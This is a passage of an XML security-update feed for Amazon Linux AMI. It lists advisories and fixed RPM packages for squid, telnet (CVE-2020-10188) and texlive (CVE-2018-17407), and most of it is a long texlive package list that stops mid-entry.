</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12519" title="" id="CVE-2019-12519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12525" title="" id="CVE-2019-12525" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13345" title="" id="CVE-2019-13345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11945" title="" id="CVE-2020-11945" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1387</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1387: important priority package update for telnet</title><issued date="2020-06-23 06:42:00" /><updated date="2020-06-26 04:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10188:
utility.c in telnetd in netkit telnet through 0.17 allows remote attackers to execute arbitrary code via short writes or urgent data, because of a buffer overflow involving the netclear and nextitem functions.
1811673: CVE-2020-10188 telnet-server: no bounds checks in nextitem() function allows to remotely execute arbitrary code
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10188" title="" id="CVE-2020-10188" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="telnet-debuginfo" version="0.17" release="49.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/telnet-debuginfo-0.17-49.9.amzn1.x86_64.rpm</filename></package><package name="telnet-server" version="0.17" release="49.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/telnet-server-0.17-49.9.amzn1.x86_64.rpm</filename></package><package name="telnet" version="0.17" release="49.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/telnet-0.17-49.9.amzn1.x86_64.rpm</filename></package><package name="telnet" version="0.17" release="49.9.amzn1" epoch="1" arch="i686"><filename>Packages/telnet-0.17-49.9.amzn1.i686.rpm</filename></package><package name="telnet-server" version="0.17" release="49.9.amzn1" epoch="1" arch="i686"><filename>Packages/telnet-server-0.17-49.9.amzn1.i686.rpm</filename></package><package name="telnet-debuginfo" version="0.17" release="49.9.amzn1" epoch="1" arch="i686"><filename>Packages/telnet-debuginfo-0.17-49.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1388</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1388: medium priority package update for texlive</title><issued date="2020-06-23 06:44:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-17407:
An issue was discovered in t1_check_unusual_charstring functions in writet1.c files in TeX Live before 2018-09-21. A buffer overflow in the handling of Type 1 fonts allows arbitrary code execution when a malicious font is loaded by one of the vulnerable tools: pdflatex, pdftex, dvips, or luatex.
1632802: CVE-2018-17407 texlive: Buffer overflow in t1_check_unusual_charstring function in writet1.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17407" title="" id="CVE-2018-17407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="texlive-changebar-doc" version="svn29349.3.5c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changebar-doc-svn29349.3.5c-45.amzn1.noarch.rpm</filename></package><package name="texlive-enctex-doc" version="svn28602.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enctex-doc-svn28602.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfigure-doc" version="svn15878.2.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfigure-doc-svn15878.2.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-xifthen-doc" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xifthen-doc-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-etex-pkg-doc" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-pkg-doc-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-graphics" version="svn25405.1.0o" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-graphics-svn25405.1.0o-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-metapost-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-ifmtarg" version="svn19363.1.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifmtarg-svn19363.1.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-placeins" version="svn19848.2.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-placeins-svn19848.2.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasysym-doc" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasysym-doc-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-lib" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-kpathsea-lib-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-koma-script" version="svn27255.3.11b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-koma-script-svn27255.3.11b-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyvrb" version="svn18492.2.8" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyvrb-svn18492.2.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-xcolor" version="svn15878.2.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xcolor-svn15878.2.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathspec" version="svn15878.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathspec-svn15878.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-multirow-doc" version="svn17256.1.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-multirow-doc-svn17256.1.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-makecmds-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makecmds-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-titling" version="svn15878.2.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titling-svn15878.2.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-rsfs-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rsfs-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-philokalia" version="svn18651.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-philokalia-svn18651.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-xifthen" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xifthen-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-norasi-c90" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-norasi-c90-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-overpic-doc" version="svn19712.0.53" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-overpic-doc-svn19712.0.53-45.amzn1.noarch.rpm</filename></package><package name="texlive-pgf-doc" version="svn22614.2.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pgf-doc-svn22614.2.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-tipa-doc" version="svn29349.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tipa-doc-svn29349.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-sauerj-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sauerj-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xecyr" version="svn20221.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecyr-svn20221.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-mdwtools-doc" version="svn15878.1.05.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mdwtools-doc-svn15878.1.05.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-breakurl" version="svn15878.1.30" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-breakurl-svn15878.1.30-45.amzn1.noarch.rpm</filename></package><package name="texlive-xdvi-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-xdvi-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-fncychap-doc" version="svn20710.v1.34" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fncychap-doc-svn20710.v1.34-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyhdr" version="svn15878.3.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyhdr-svn15878.3.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pxfonts" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pxfonts-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-parskip-doc" version="svn19963.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parskip-doc-svn19963.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-float-doc" version="svn15878.1.3d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-float-doc-svn15878.1.3d-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex4ht-doc" version="svn29474.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex4ht-doc-svn29474.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bidi-doc" version="svn29650.12.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bidi-doc-svn29650.12.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-lettrine" version="svn29391.1.64" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lettrine-svn29391.1.64-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm-math" version="svn29044.1.958" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lm-math-svn29044.1.958-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre-math-doc" version="svn29045.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-math-doc-svn29045.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-utopia-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-utopia-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-psfrag" version="svn15878.3.04" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psfrag-svn15878.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-ec-doc" version="svn25033.1.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ec-doc-svn25033.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-text-doc" version="svn15878.1.00" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-text-doc-svn15878.1.00-45.amzn1.noarch.rpm</filename></package><package name="texlive-xstring-doc" version="svn29258.1.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xstring-doc-svn29258.1.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-txfonts-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-txfonts-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cite-doc" version="svn19955.5.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cite-doc-svn19955.5.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-unisugar" version="svn22357.0.92" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unisugar-svn22357.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-bibtex-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-booktabs-doc" version="svn15878.1.61803" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-booktabs-doc-svn15878.1.61803-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipng-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-dvipng-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-unicode-math" version="svn29413.0.7d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unicode-math-svn29413.0.7d-45.amzn1.noarch.rpm</filename></package><package name="texlive-etex-pkg" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etex-pkg-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-garuda-c90" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-garuda-c90-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-type1cm-doc" version="svn21820.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-type1cm-doc-svn21820.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-filehook" version="svn24280.0.5d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filehook-svn24280.0.5d-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx-doc" version="svn26765.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfmx-doc-svn26765.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-rcs-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rcs-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tools-doc" version="svn26263.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tools-doc-svn26263.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xstring" version="svn29258.1.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xstring-svn29258.1.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-super" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-super-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ctable-doc" version="svn26694.1.23" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ctable-doc-svn26694.1.23-45.amzn1.noarch.rpm</filename></package><package name="texlive-wadalab" version="svn22576.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wadalab-svn22576.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-enumitem-doc" version="svn24146.3.5.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enumitem-doc-svn24146.3.5.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3experimental-doc" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3experimental-doc-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-csquotes-doc" version="svn24393.5.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-csquotes-doc-svn24393.5.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatexbase" version="svn22560.0.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatexbase-svn22560.0.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-xtab" version="svn23347.2.3f" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xtab-svn23347.2.3f-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-fill" version="svn15878.1.01" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-fill-svn15878.1.01-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-node" version="svn27799.1.25" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-node-svn27799.1.25-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-documentation-base" version="svn17091.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-documentation-base-svn17091.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-titling-doc" version="svn15878.2.1d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titling-doc-svn15878.2.1d-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasysym" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasysym-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetexfontinfo" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetexfontinfo-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost" version="svn26689.1.212" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metapost-svn26689.1.212-45.amzn1.noarch.rpm</filename></package><package name="texlive-oberdiek" version="svn26725.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-oberdiek-svn26725.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-euro-doc" version="svn22191.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euro-doc-svn22191.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyhdr-doc" version="svn15878.3.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyhdr-doc-svn15878.3.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-natbib" version="svn20668.8.31b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-natbib-svn20668.8.31b-45.amzn1.noarch.rpm</filename></package><package name="texlive-mflogo" version="svn17487.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mflogo-svn17487.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-collectbox" version="svn26557.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collectbox-svn26557.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-setspace-doc" version="svn24881.6.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-setspace-doc-svn24881.6.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3experimental" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3experimental-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-ulem" version="svn26785.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ulem-svn26785.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-doc" version="svn29581.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-doc-svn29581.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucs-doc" version="svn27549.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucs-doc-svn27549.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-philokalia-doc" version="svn18651.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-philokalia-doc-svn18651.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-mdwtools" version="svn15878.1.05.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mdwtools-svn15878.1.05.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontbook" version="svn23608.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontbook-svn23608.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-kastrup" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kastrup-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-powerdot-doc" version="svn25656.1.4i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-powerdot-doc-svn25656.1.4i-45.amzn1.noarch.rpm</filename></package><package name="texlive-setspace" version="svn24881.6.7a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-setspace-svn24881.6.7a-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfm" version="svn26689.0.13.2d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfm-svn26689.0.13.2d-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-fonts" version="svn28888.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-fonts-svn28888.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-section-doc" version="svn20180.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-section-doc-svn20180.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tetex-doc" version="svn29585.3.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tetex-doc-svn29585.3.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-zapfchan" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-zapfchan-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-microtype" version="svn29392.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-microtype-svn29392.2.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-dvipdfmx-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-xltxtra" version="svn19809.0.5e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xltxtra-svn19809.0.5e-45.amzn1.noarch.rpm</filename></package><package name="texlive-xesearch-doc" version="svn16041.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xesearch-doc-svn16041.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-luatex-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-xepersian" version="svn29661.12.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xepersian-svn29661.12.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex" version="svn26689.3.1415926" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-svn26689.3.1415926-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-fontsrecommended" version="svn28082.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-fontsrecommended-svn28082.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-fixlatvian" version="svn21631.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fixlatvian-svn21631.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathpazo" version="svn15878.1.003" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathpazo-svn15878.1.003-45.amzn1.noarch.rpm</filename></package><package name="texlive-carlisle-doc" version="svn18258.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-carlisle-doc-svn18258.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-coil" version="svn24020.1.06" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-coil-svn24020.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetexfontinfo-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetexfontinfo-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-babel" version="svn24756.3.8m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babel-svn24756.3.8m-45.amzn1.noarch.rpm</filename></package><package name="texlive-datetime" version="svn19834.2.58" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-datetime-svn19834.2.58-45.amzn1.noarch.rpm</filename></package><package name="texlive-xmltex" version="svn28273.0.8" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xmltex-svn28273.0.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-ncctools-doc" version="svn15878.3.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ncctools-doc-svn15878.3.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-t2-doc" version="svn29349.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-t2-doc-svn29349.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-soul" version="svn15878.2.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-soul-svn15878.2.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-eps" version="svn15878.1.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-eps-svn15878.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-natbib-doc" version="svn20668.8.31b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-natbib-doc-svn20668.8.31b-45.amzn1.noarch.rpm</filename></package><package name="texlive-index" version="svn24099.4.1beta" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-index-svn24099.4.1beta-45.amzn1.noarch.rpm</filename></package><package name="texlive-fmtcount-doc" version="svn28068.2.02" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fmtcount-doc-svn28068.2.02-45.amzn1.noarch.rpm</filename></package><package name="texlive-epsf-doc" version="svn21461.2.7.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epsf-doc-svn21461.2.7.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-helvetic" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-helvetic-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-preprint-doc" version="svn16085.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-preprint-doc-svn16085.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pgf" version="svn22614.2.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pgf-svn22614.2.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontware" version="svn26689.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontware-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-coil-doc" version="svn24020.1.06" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-coil-doc-svn24020.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtopic" version="svn15878.1.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtopic-svn15878.1.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-base" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-base-2012-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xecolor" version="svn29660.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecolor-svn29660.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-collectbox-doc" version="svn26557.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collectbox-doc-svn26557.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-algorithms" version="svn15878.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-algorithms-svn15878.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm-math-doc" version="svn29044.1.958" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lm-math-doc-svn29044.1.958-45.amzn1.noarch.rpm</filename></package><package name="texlive-arabxetex" version="svn17470.v1.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arabxetex-svn17470.v1.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-xeindex-doc" version="svn16760.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xeindex-doc-svn16760.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-marvosym" version="svn29349.2.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marvosym-svn29349.2.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-txfonts" version="svn15878.0" release="45.amzn1" epoch="2" 